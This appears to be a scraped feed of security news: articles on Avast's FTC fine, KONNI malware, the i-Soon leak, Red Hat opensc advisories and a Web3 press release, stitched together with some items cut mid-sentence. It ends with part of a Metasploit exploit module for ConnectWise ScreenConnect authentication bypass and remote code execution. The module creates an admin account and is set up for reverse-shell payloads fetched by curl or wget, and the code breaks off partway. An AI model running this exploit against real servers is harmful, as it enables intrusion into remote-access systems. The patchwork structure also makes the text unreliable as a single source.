More than 8,000 subdomains belonging to legitimate brands and institutions have been hijacked as part of a sophisticated distribution architecture for spam proliferation and click monetization.
Guardio Labs is tracking the coordinated malicious activity, which has been ongoing since at least September 2022, under the name SubdoMailing. The emails range from "counterfeit package delivery alerts

8,000+ Subdomains of Trusted Brands Hijacked for Massive Spam Operation

By Deeba Ahmed
Avast Hit with $16.5 Million Fine, Settles with FTC Over Deceptive Data Practices, Forced to Delete User Information
This is a post from HackRead.com Read the original post: Avast Fined Millions for Selling User Browsing Data

Avast, a popular antivirus software, has been fined $16.5 million for selling user browsing data despite claims of protecting privacy. The FTC accused them of misleading users and selling sensitive information without consent. Avast agreed to settle, stop selling data, and delete user information.

The US Federal Trade Commission (FTC) has imposed a $16.5 million fine on Avast Limited, **Avast Software,** and Jumpshot for deceiving users by claiming its software would eliminate web tracking but doing the tracking itself.

It is worth noting that, the Prague, Czech Republic-based anti-malware and cybersecurity vendor stored the data indefinitely and sold it without consumers’ consent or notice while promising users exemplary privacy protection.

This development reflects the continuation of the FTC’s crackdown on companies involved in deceptive data privacy practices. In January 2024, it reached a **settlement** with Outlogic to prevent selling information for tracking user locations and **banned** InMarket from selling precise user locations.

The FTC’s Director of Consumer Protection, Samuel Levine, criticized Avast’s bait-and-switch surveillance tactics for violating consumer privacy.

In its complaint, available **here** (PDF), the FTC revealed that cybersecurity software company Avast collected consumers’ browsing information through its browser extensions and antivirus software, including Avast Extensions, Avast Secure Browser, Avast Mobile Software, and Avast Desktop Software. The FTC accused Avast of selling its data to over 100 third parties via Jumpshot.

For your information, in 2013, Avast acquired competitor Jumpshot, rebranded as an analytics company, and sold browsing information collected from consumers from 2014 to 2020 through it. The FTC accused Jumpshot of offering products that enabled user tracking and associating browsing histories with third-party information.

Jumpshot entered a contract with Omnicom, offering an “All Clicks Feed” for 50% of customers in the US, UK, Mexico, Australia, Canada, and Germany, and earned millions in gross revenues. Avast’s dubious data privacy practices were exposed in 2020 in a joint investigation, leading to the **shutdown of Jumpshot**.

Reportedly, the company collected data on religious beliefs, health concerns, political views, locations, and financial status from 2014 to 2020. The FTC found Avast failed to adequately anonymize browsing information despite the company claiming otherwise.

FTC also discovered that Avast sold data with unique identifiers for each browser, which exposed crucial data like visited websites, timestamps, user location, and the type of device and browser.

Avast agreed to settle the case with the FTC, paying $16.5 million. The order also requires Avast to stop selling or licensing browsing data to advertisers, delete all data obtained by Jumpshot, and notify affected customers of the sale.

How Jumpshot functioned

Avast’s spokesperson, Jeff Monney, reaffirmed the company’s commitment to protecting and empowering users’ digital lives, citing disagreement on the allegations while opting for a settlement.

Data privacy violations can lead to significant financial consequences for companies like Avast, including fines, lawsuits, lost business, reputational damage, and negative press coverage. Regulatory bodies enforce data privacy laws and can sue companies, resulting in further financial losses and legal costs, as evident in Avast’s case.

****RELATED ARTICLES****

1.  **HelloFresh Fined £140,000 for 80 Million Spam Messages**
2.  **Unreleased Music Stolen and Sold on Dark Web: Hacker Fined**
3.  **Google Incognito Mode: New Disclaimer Reveals Data Tracking**
4.  **Meta Fined €265 million in Facebook Data Scraping Case in the EU**
5.  **Sephora Fined $1.2 Million for Breaching CCPA and Selling User Data**
6.  **Apple and Samsung fined millions for slowing down old smartphones**

Avast Fined Millions for Selling User Browsing Data

Red Hat Security Advisory 2024-0967-03 - An update for opensc is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0967.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opensc security updateAdvisory ID:        RHSA-2024:0967-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0967Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2023-5992====================================================================Summary: An update for opensc is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Side-channel leaks while stripping encryption PKCS#1 padding (CVE-2023-5992)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5992References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2248685

Red Hat Security Advisory 2024-0967-03

Red Hat Security Advisory 2024-0966-03 - An update for opensc is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0966.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: opensc security updateAdvisory ID:        RHSA-2024:0966-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0966Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2023-5992====================================================================Summary: An update for opensc is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The OpenSC set of libraries and utilities provides support for working with smart cards. OpenSC focuses on cards that support cryptographic operations and enables their use for authentication, mail encryption, or digital signatures.Security Fix(es):* OpenSC: Side-channel leaks while stripping encryption PKCS#1 padding (CVE-2023-5992)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5992References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2248685

Red Hat Security Advisory 2024-0966-03

By Owais Sultan
British Virgin Islands, 26 February 2024 – Friendzone, the sustainable and scalable Web3 platform redefining Social Finance (SocialFi)…
This is a post from HackRead.com Read the original post: Friendzone Launches Social Monetization on Polygon PoS for 5,000+ Waitlisted Users

**_British Virgin Islands, 26 February 2024_** – Friendzone, the sustainable and scalable Web3 platform redefining Social Finance (SocialFi) on the blockchain, has officially launched on the Polygon Proof-of-Stake network. The launch of the Social Capital Marketplace is the first of many key milestones for Friendzone in its mission to become the number #1 social media **dApp** in the Web3 industry. 

Friendzone is an entirely novel decentralized protocol that marries the engagement of traditional social media with the unique financial rewards enabled by **Web3 technology**, paving the way for the creation of more empowering online communities. In this way, Friendzone is much more than just another SocialFi platform.

It represents a paradigm shift that not only recognizes social media presence and influence but rewards it in tangible and monetizable ways. It promises to redefine the social media industry as a place where every interaction can potentially generate value, empowering content creators and users alike to monetize their online experiences seamlessly. 

The launch on Polygon PoS coincides with the closure of a significant funding round led by angel investors including Kain Warwick (Founder of Synthetix), Kieran Warwick (Founder of Illuvium), Danny Wilson (CFO of Illuvium), Thomas Aslanian (Product & Token Lead of Immutable), Anton Buenavista (Founding Team Pendle Finance), Jackson Chan (Co-Founder of PHD Capital) and many other incredible angels with experience at Synthetix, Pendle Finance, Bybit, Metastreet Labs and Renzo Protocol.

Alongside the round, which brings Friendzone’s total amount raised to more than USD 750,000, the startup is pleased to welcome the aforementioned investors, plus TN Lee (Co-Founder of Pendle Finance) and John Park (Partner at Sparklabs) to its growing advisory board. 

Although Friendzone is competing in an increasingly crowded SocialFi space, its platform is differentiated from others through its nuanced incentive and protocol design. Friendzone is uniquely focused on overcoming the scalability and liquidity challenges that have hampered the growth of first-generation SocialFi platforms, setting it up to become the first protocol of its kind to go mainstream. 

Friendzone has designed its protocol economics around an adaptive bonding curve that takes into account market feedback in real-time, ensuring that its token valuation is always fair, with continuous access for both small and large networks. Through this mechanism, it promotes sustained engagement and network growth without being constrained by the accessibility and liquidity bottlenecks that have held back alternative SocialFi protocols. 

With its custom creator controls, Friendzone empowers everyone to be a creator with the ability to customize their social media activity and create tailored offerings ranging from public events to private groups, where they can set terms and prices that better reflect the value they provide.

Besides the purchase and sale of its “Creator Chips”, Friendzone incorporates a staking feature into its tokenomics model that takes into account both the quantity and duration of the user’s stake. It’s inspired by Curve’s veCRV model and aims to ensure a more equitable distribution of each creator’s revenue, incentivizing network users to actively contribute to the success of every creator with a share of their rewards. 

Through these novel innovations, Friendzone promises to transcend the emotional incentives of traditional social media networks by integrating powerful financial incentives enabled only with crypto, amplifying its network effects to enhance user engagement and fairly reward participation on the platform and all integrated decentralized applications existing today. 

****A Progressive Rollout****

Friendzone has generated enormous interest before its launch on Polygon PoS, with more than 5,000 whitelisted users signed up. To ensure stability during its incentivized beta rollout, the protocol is capping the number of users allowed onto the network in batches of 1000. The plan is to progressively onboard more users as the project demonstrates its worth and evolves from its beta stage, where it will be closely monitored for bugs and refined to provide an optimal user experience. 

The initial 1000 users selected to participate in the launch can now head to X, formerly known as Twitter, to claim their Friendzone handles, which will be the same as their X handles.

During the initial launch period, Friendzone will also integrate a new points system into its protocol, enabling early adopters who beta test the product to begin accumulating points to enhance their rewards and reputations on the platform. 

“We are immensely proud to launch Friendzone with the support of the Polygon ecosystem, a collaboration that marks a significant milestone in our journey. The Polygon PoS Network’s exceptional scalability, speed, and security offer the perfect foundation for Friendzone, enabling us to redefine social media engagement and monetization in the Web3 space.

The commitment to innovation and the success of projects built on Polygon PoS is unparalleled. This strategic relationship is a testament to our shared vision of empowering users and creators in a disruptive decentralized digital economy.” said Kevin Lu, CEO & Co-Founder of Friendzone.

Friendzone is delighted to bring its collaboration with the Polygon ecosystem to the next level, tapping into its powerful ecosystem and leveraging its expertise to explore new use cases and accelerate innovation in the SocialFi space. Friendzone is poised to unleash new dynamics and explore uncharted waters on Polygon PoS as it seeks to bring more value to users in the nascent decentralized social media industry. 

The Polygon ecosystem has already distinguished itself in the blockchain arena with its strong ethos of innovation and a litany of unparalleled strategic brand collaborations, making it an ideal landing spot for Friendzone. The protocol’s integration with the Polygon network enables it to make plans toward tapping into an innovative zkEVM-based Layer-2 architecture that will be instrumental in accelerating its growth as it scales its network and expands its user base.

The Polygon networks are home to some of the most dynamic and diverse ecosystems of groundbreaking dApps and communities in the blockchain world, providing further opportunities to collaborate, innovate and bring SocialFi into the mainstream. 

“Friendzone represents the first of its kind in the SocialFi space, pioneering a new era of social media that rewards engagement with real value. We are proud to have Friendzone build on Polygon PoS and to work closely with their team to achieve our mutual goals. Their innovative approach to integrating social interactions with value incentives sets a new standard in the industry. This collaboration underscores Polygon’s dedication to supporting groundbreaking projects that push the boundaries of what’s possible in Web3 and beyond.” said SungMo Park, Head of BD APAC at Polygon Labs.

Today’s launch and funding round represents the first of many milestones to come for Friendzone, laying the groundwork for a truly interoperable protocol that will provide a scalable foundation to support the monetization layer of on-chain social graphs. 

****About Friendzone****

Friendzone is the premier social Web3 platform introducing real-time adaptive pricing and native reward distribution to ensure fair and dynamic value exchange, tailored to a creator’s reputation and community support. The platform is the first to incentivize sustained engagement and offers creators extensive control over content monetization, promoting a robust and inclusive digital circular economy at scale.

Friendzone is supported by a dedicated team of core contributors and advisors from industry-leading entities such as Synthetix, Band Protocol, Koinly, Immutable, Pendle Finance, Cyball, and Sparklabs.

1.  **GAM3S.GG Raises $2M to Grow Web3 Gaming Superapp**
2.  **Particle Network’s Intent-Centric Approach Aims and Secure Web3**
3.  **Web3 Needs A Decentralized Infrastructure That IPFS Cannot Deliver**
4.  **Signal21 Beta Launch Bridges Gap in Blockchain Intelligence Services**
5.  **READYgg Gets Web2 Players into Web3 in Partnership with Aptos Labs**

Friendzone Launches Social Monetization on Polygon PoS for 5,000+ Waitlisted Users

A set of fake npm packages discovered on the Node.js repository has been found to share ties with North Korean state-sponsored actors, new findings from Phylum show.
The packages are named execution-time-async, data-time-utils, login-time-utils, mongodb-connection-utils, and mongodb-execution-utils.
One of the packages in question, execution-time-async, masquerades as its legitimate

North Korean Hackers Targeting Developers with Malicious npm Packages

By cyberwire
Brea, California, February 26th, 2024, Cyberwire – The current large surge in cyber threats has left many organizations…
This is a post from HackRead.com Read the original post: ThreatHunter.ai Halts 100s of Attacks: Battling Ransomware & Nation-State Cyber Threats

**Brea, California, February 26th, 2024, Cyberwire** – The current large surge in cyber threats has left many organizations grappling for security so ThreatHunter.ai is taking decisive action. Recognizing the critical juncture at which the digital world stands, ThreatHunter.ai is now offering its cutting-edge cybersecurity services free of charge to all organizations for 30 days, irrespective of their current cybersecurity measures. 

James McMurry, Founder of ThreatHunter.ai, reflects on the situation’s urgency: “In the past 48 hours alone, we have stopped hundreds of actual attacks and performed mitigations for our customers. Yet, the frequency and sophistication of these attacks are escalating at an alarming rate. Our mission is clear: to extend our protective reach to every organization in need, ensuring that the digital frontier is safe for all.”

Drawing on recent events and the resilient nature of cyber threats, as highlighted in an insightful piece on the LockBit ransomware saga, it’s evident that the cybersecurity landscape is more volatile than ever. The LockBit group’s audacity in bouncing back after a significant takedown operation underlines the persistent and evolving threat posed by cybercriminals. 

ThreatHunter.ai, with its elite team of threat hunters, engineers, and cybersecurity experts, employs the ARGOS platform to provide real-time threat detection and mitigation. Our AI and ML-driven technologies have been pivotal in safeguarding organizations from the ever-evolving tactics of cyber adversaries.

“We see the problem getting larger, with cyber threats becoming more sophisticated by the day. Offering our services for free for 30 days is our way of bolstering the defences of organizations across the globe. It’s a call to action for everyone, and to show that ThreatHunter.ai is much more than all the MDRs offering automated alerts, we actually will stop threats, and how our team operates as part of our customers’ cyber team,” McMurry emphasizes.

This initiative is not just about offering a temporary solution; it’s about raising awareness and driving home the point that in the face of rising cyber threats, complacency is not an option.

Organizations interested in taking advantage of ThreatHunter.ai’s complimentary 30-day services are encouraged to reach out immediately. Together, we can turn the tide against the cyber threats that loom large over our connected world.

****About ThreatHunter.ai****

ThreatHunter.ai is at the forefront of cybersecurity, specializing in real-time detection, analysis, and mitigation of cyber threats. Powered by the innovative ARGOS platform, our approach combines advanced AI and ML technologies with the expertise of the industry’s most skilled professionals. We are dedicated to defending the digital infrastructure against the complex landscape of cyber threats, ensuring peace of mind for businesses and governments worldwide.

ThreatHunter.ai, a 100% Service-Disabled Veteran Owned Small Business, is a leading provider of AI-driven threat-hunting solutions. Its advanced machine learning algorithms and expert analysis help organizations detect, identify, and respond to cyber threats. Its solutions are designed to supplement existing security resources and provide a fresh perspective on how to address today’s complex cyber threats.

Don’t miss the opportunity to safeguard your organization with the unparalleled cybersecurity protection offered by ThreatHunter.ai. Visit our website at www.threathunter.ai to explore our unique approach, learn more about our cutting-edge solutions, and discover how we can empower your business to stay ahead of cyber threats.

To speak with our experts or schedule a personalized demo, reach out to our sales team at \[email protected\] or call 714.515.4011. Take action today and ensure the security and resilience of your digital infrastructure.

****Contact****

*   **Lydia Coulter**
*   **Marketing and Media Manager**
*   **ThreatHunter.ai**
*   **7145154011**
*   **\[email protected\]**

ThreatHunter.ai Halts 100s of Attacks: Battling Ransomware & Nation-State Cyber Threats

By Waqas
Friend or Foe?
This is a post from HackRead.com Read the original post: Russian Ministry Software Backdoored with North Korean KONNI Malware

Discover the latest cybersecurity revelation: KONNI malware, linked to North Korean cyber operations, targets the Russian Ministry of Foreign Affairs. Learn about the sophisticated tactics and geopolitical implications

German cybersecurity firm DCSO has discovered a malware sample uploaded to VirusTotal in January 2024, believed to be part of North Korea-linked activity targeting the Russian Ministry of Foreign Affairs (MID). The malware is believed to be **KONNI**, a North Korean nexus tool used since 2014.

KONNI, first **discovered in 2014**, is associated with the Democratic People’s Republic of Korea (DPRK)-nexus actors like Konni Group and TA406. The malware has unique stealer functionality and remote administration capability. It’s installed in an MSI file, with C2 servers encrypted with AES-CTR, and a CustomAction for detection and payload selection.

In the latest discovery, researchers noted that KONNI’s command set remains unchanged, allowing operators to execute commands, upload/download files, specify sleep intervals, communicate via HTTP, and compress file extensions into .CAB archives.

> #ShortAndMalicious  
> Our researchers recently discovered an installer for the mandatory 🇷🇺Russian tax filling software "Spravki BK" (Справки БК) which was backdoored with #KONNI malware, generally attributed to 🇰🇵North Korean threat actors. 1/5
> 
> — DCSO CyTec (@DCSO\_CyTec) October 17, 2023

Interestingly, the sample **DCSO analyzed** was delivered via a backdoored Russian language software installer, similar to a previously observed KONNI delivery technique. The sample was for a tool called “Statistika KZU”, which is believed to be intended for internal use within the Russian MID. The software is used for relaying annual report files from overseas consular posts to the MID’s Consular Department via a secure channel.

Additionally, two user manuals were found in the backdoored installer, detailing the installation and usage of the “Statistika KZU” program. The first manual explains installing the program on an administrative account, providing minimum software requirements and screenshots.

The second 22-pager manual, “StatRKZU\_Pyкoвoдcтвo,” outlines how to use the software for generating annual report files on KZU consular activities, including templates for calculating registered and detained citizens.

The MID’s software, identified as “GosNIIAS” (a Russian federal research institute primarily involved in aerospace research), was tested offline and found legitimate. Despite no direct correlations between GosNIIAS and Statistika KZU, references to contracts were found, including a procurement order for automated system maintenance and data protection software.

This discovery comes amid increasing geopolitical proximity between Russia and the DPRK, following Russia’s renewed invasion of Ukraine in 2022.

****Russia and North Korea’s Cyber Standoff****

This is not the first time Russia and North Korea have made collective headlines over cybersecurity threats. **In August 2023**, the world witnessed another significant incident when “elite North Korean hackers” affiliated with OpenCarrot and the Lazarus group breached NPO Mashinostroyeniya, a key Russian missile developer. This breach, lasting for at least five months, revealed the alarming capabilities and determination of the attackers.

****Previous Use of KONNI Backdoor****

KONNI has been used in many cyberespionage campaigns targeting Russian agencies. FortiGuard Labs discovered a KONNI malware campaign **in November 2023**, targeting Windows systems through Word documents with malicious macros. Malwarebytes researchers **discovered** a campaign in mid-2021 using Russian language lures concerning Russian-Korean trade and economic issues and a meeting of a Russian-Mongolian intergovernmental commission.

An unknown hacking group **targeted** North Korean organizations using KONNI Malware in 2017. Three campaigns were identified back then- two by Talos Intelligence, a Cisco-owned cybersecurity firm, and the third reported by Cylance security firm.

For insights into this, we reached out to John Bambenek, President at Bambenek Consulting, who emphasised that “It is not uncommon for intelligence agencies to spy even on their putative allies, if for nothing else, for insights to either strengthen the relationship or to identify and mitigate threats.”

Mr. Bambenek highlighted that “The use of a backdoor in software used almost exclusively by the Russian Foreign Ministry stands out and shows that the DPRK did their research here for a particular hook into their victims and is, ironically, a more targeted and precise adaptation of the approach Russian intelligence used with **NotPetya**.”

“Espionage has a couple of nuances where sometimes you want more sophisticated tools and for some attacks, you want narrow and simpler tools. For espionage, you want long-term persistent infection and sophisticated and interactive tools provide defenders more opportunities for detection. It’s not uncommon to see tools used for espionage that lack some of the obfuscation commonly observed in **cybercrime tools**,” he added.

****RELATED ARTICLES****

1.  **Gone: Russian Central Bank hacked; $31 million stolen**
2.  **2 Russian Industrial Firms Hacked, 112GB of Data Leaked**
3.  **Anonymous Leaks 128 GB of Data from Russian ISP Convex**
4.  **Elite North Korean Hackers Breach Russian Missile Developer**
5.  **Anonymous Hacks Central Bank of Russia; Leaks 28GB of Data**

Russian Ministry Software Backdoored with North Korean KONNI Malware

Plus: Scammers try to dupe Apple with 5,000 fake iPhones, Avast gets fined for selling browsing data, and researchers figure out how to clone fingerprints from your phone screen.

Today marks two years since Russia launched its full-scale invasion of Ukraine. This week, we detailed the growing crisis in Eastern Ukraine, which is now littered with deadly mines. As it fights back the invading Russian forces, Ukraine’s government is working to develop new mine-clearing technology that could help save lives around the globe.

A leaked document obtained by WIRED has revealed the secret placement of gunshot-detection sensors in locations around the United States and its territories. According to the document, which ShotSpotter's parent company authenticated, the sensors, which are used by police departments in dozens of metropolitan areas in the United States, are largely located in low-income and minority communities, according to WIRED’s analysis, adding crucial context in a long-running debate over police use of the technology.

Speaking of leaks, WIRED this week obtained 15 years of messages posted to an internal system used by members of the US Congress. The House Intelligence Committee used the “Dear Colleagues” system to warn lawmakers of an “urgent matter”—something that has not happened since at least 2009. That urgent matter, which was quickly leaked to the press, turned out to be related to Russian military research of space-based weapons. But some sources say the matter wasn’t urgent at all, and the warning was instead an attempt by House Intelligence leadership to derail a vote on privacy reforms to a major US surveillance program.

On Tuesday, a coalition of law enforcement agencies led by the UK’s National Crime Agency disrupted the LockBit ransomware gang’s operation, seizing its infrastructure, dark-web leak site, and code used to carry out its attacks against thousands of institutions globally. Although ransomware attacks resulted in a record $1.1 billion in ransom payments last year, Anne Neuberger, a top US cyber official in the Biden administration, tells WIRED how the 2021 ransomware attack on Colonial Pipeline has transformed the ways American institutions defend against and respond to such attacks.

In dual wins for privacy this week, the Signal Foundation began its rollout of usernames for its popular end-to-end encrypted messaging app. The update will allow people to connect without having to reveal their phone numbers. Meanwhile, Apple began to future-proof its encryption for iMessage with the launch of PQ3, a next-generation encryption protocol designed to resist decryption from quantum computers.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

Hundreds of documents linked to a Chinese hacking-for-hire firm were dumped online this week. The files belong to i-Soon, a Shanghai-based company, and give a rare glimpse into the secretive world of the industry that supports China’s state-backed hacking. The leak includes details of Chinese hacking operations, lists of victims and potential targets, and the day-to-day complaints of i-Soon staff.

“These leaked documents support TeamT5’s long-standing analysis: China's private cybersecurity sector is pivotal in supporting China’s APT attacks globally,” Che Chang, a cyber threat analyst at the Taiwan-based cybersecurity firm TeamT5, tells WIRED. Chang says the company has been tracking i-Soon since 2020 and found that it has a close relationship with Chengdu 404, a company linked to China’s state-backed hackers.

While the documents have now been removed from GitHub, where they were first posted, the identity and motivations of the person, or people, who leaked them remains a mystery. However, Chang says the documents appear to be real, a fact confirmed by two employees working for i-Soon, according to the Associated Press, which reported that the company and police in China are investigating the leak.

“There are around eight categories of the leaked files. We can see how i-Soon engaged with China's national security authorities, the details of i-Soon’s products and financial problems,” Chang says. “More importantly, we spotted documents detailing how i-Soon supported the development of the notorious remote access Trojan (RAT), ShadowPad,” Chang adds. The ShadowPad malware has been used by Chinese hacking groups since at least 2017.

Since the files were first published, security researchers have been poring over their contents and analyzing the documentation. Included were references to software to run disinformation campaigns on X, details of efforts to access communications data across Asia, and targets within governments in the United Kingdom, India, and elsewhere, according to reports by the _New York Times_ and the _The Washington Post_. The documents also reveal how i-Soon worked for China’s Ministry of State Security and the People’s Liberation Army.

According to researchers at SentinelOne, the files also include pictures of “custom hardware snooping devices,” such as a power bank that could help steal data and the company’s marketing materials. “In a bid to get work in Xinjiang–where China subjects millions of Ugyhurs to what the UN Human Rights Council has called genocide–the company bragged about past counterterrorism work,” the researchers write. “The company listed other terrorism-related targets the company had hacked previously as evidence of their ability to perform these tasks, including targeting counterterrorism centers in Pakistan and Afghanistan.”

The Federal Trade Commission has fined antivirus firm Avast $16.5 for collecting and selling people’s web browsing data through its browser extensions and security software. This included the details of web searches and the sites people visited, which, according to the FTC, revealed people’s “religious beliefs, health concerns, political leanings, location, financial status, visits to child-directed content and other sensitive information.” The company sold the data through its subsidiary Jumpshot, the FTC said in an order announcing the fine.

The ban also places five obligations on Avast: not to sell or license browsing data for advertising purposes; to obtain consent if it is selling data from non-Avast products; delete information it transferred to Jumpshot and any algorithms created from the data; tell customers about the data it sold; and introduce a new privacy program to address the problems the FTC found. An Avast spokesperson said that while they “disagree with the FTC’s allegations and characterization of the facts,” they are “pleased to resolve this matter.”

Two Chinese nationals living in Maryland—Haotian Sun and Pengfei Xue—have been convicted of mail fraud and a conspiracy to commit mail fraud for a scheme that involved sending 5,000 counterfeit iPhones to Apple. The pair, who could each face up to 20 years in prison, according to the The Register, hoped Apple would send them real phones in return. The fake phones had “spoofed serial numbers and/or IMEI numbers” to trick Apple stores or authorized service providers into thinking they were genuine. The scam took place between May 2017 and September 2019 and would have cost Apple more than $3 million in losses, a US Department of Justice press release says.

Security researchers from the US and China have created a new side-channel attack that can reconstruct people’s fingerprints from the sounds they create as you swipe them across your phone screen. The researchers used built-in microphones in devices to capture the “faint friction sounds” made by a finger and then used these sounds to create fingerprints. “The attack scenario of PrintListener is extensive and covert,” the researchers write in a paper detailing their work. “It can attack up to 27.9 percent of partial fingerprints and 9.3 percent of complete fingerprints within five attempts.” The research raises concerns about real-world hackers who are attempting to steal people’s biometrics to access bank accounts.

A Mysterious Leak Exposed Chinese Hacking Secrets

This Metasploit module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage this to achieve remote code execution by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7 and below are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ConnectWise ScreenConnect Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create          a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage          this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7          and below are affected.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF RCE Exploit          'WatchTowr', # Auth Bypass PoC        ],        'References' => [          ['CVE', '2024-1708'], # Path traversal when extracting zip file.          ['CVE', '2024-1709'], # Auth bypass to create admin account.          ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory          ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], #  Auth Bypass PoC          ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] #  Analysis of both CVEs        ],        'DisclosureDate' => '2024-02-19',        'Platform' => %w[win linux unix],        'Arch' => [ARCH_X64, ARCH_CMD],        'Privileged' => true, # 'NT AUTHORITY\SYSTEM' on Windows, root on Linux.        'Targets' => [          [            # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:            # windows/x64/meterpreter/reverse_tcp            'Windows In-Memory', {              'Platform' => 'win',              'Arch' => ARCH_X64            }          ],          [            # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:            # cmd/windows/http/x64/meterpreter/reverse_tcp            'Windows Command', {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'FETCH_COMMAND' => 'CURL',                'FETCH_WRITABLE_DIR' => '%TEMP%'              }            }          ],          [            # Tested ScreenConnect 20.3.31734 on Ubuntu 18.04.6 with payloads:            # cmd/linux/http/x64/meterpreter/reverse_tcp            # cmd/unix/reverse_bash            'Linux Command', {              'Platform' => %w[linux unix],              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'FETCH_COMMAND' => 'WGET',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ]        ],        'DefaultOptions' => {          'RPORT' => 8040,          'SSL' => false,          'EXITFUNC' => 'thread'        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            CONFIG_CHANGES,            # The existing administrator account will be replaced            ACCOUNT_LOCKOUTS          ]        }      )    )    register_options([      OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alpha_lower(8)]),      OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(16)])    ])  end  def check    # This is a file found on the recent 23.9.7.8804 (Circa 2024), an out of support 20.3.31734 (Circa 2021), and    # a very old 2.5.3409.4645 (Circa 2012). So we can expect this file to exist on all targets. As this endpoint    # expects authentication, the response will be a 302 redirect to the Login page. As Windows is case insensitive    # we can request 'Host.aspx' with any case and get the expected 302 response, however Linux is case sensitive and    # will always 404 a request to 'Host.aspx' if we jumble up the case. Both a 302 and 404 response will still include    # the Server header, which we use to confirm both ScreenConnect and the version number.    host_aspx = 'Host.aspx'    host_aspx = loop do      jumblecase_host_aspx = host_aspx.chars.map { |c| rand(2) == 0 ? c.upcase : c.downcase }.join      break jumblecase_host_aspx unless jumblecase_host_aspx == host_aspx    end    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, host_aspx)    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 302 || res.code == 404    platform = res.code == 302 ? 'Windows' : 'Linux'    if res.headers.key?('Server') && (res.headers['Server'] =~ %r{ScreenConnect/(\d+\.\d+.\d+)})      detected = "ConnectWise ScreenConnect #{Regexp.last_match(1)} running on #{platform}."      if Rex::Version.new(Regexp.last_match(1)) <= Rex::Version.new('23.9.7')        return CheckCode::Appears(detected)      end      return CheckCode::Safe(detected)    end    CheckCode::Unknown  end  def exploit    # Sanity check the USERNAME and PASSWORD will meet the servers password requirements.    fail_with(Failure::BadConfig, 'USERNAME must not be empty.') if datastore['USERNAME'].empty?    fail_with(Failure::BadConfig, 'PASSWORD must be 8 characters of more.') if datastore['PASSWORD'].length < 8    #    # 1. Begin the setup wizard using the vulnerability to access the SetupWizard.aspx page.    #    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/')    )    unless res&.code == 200      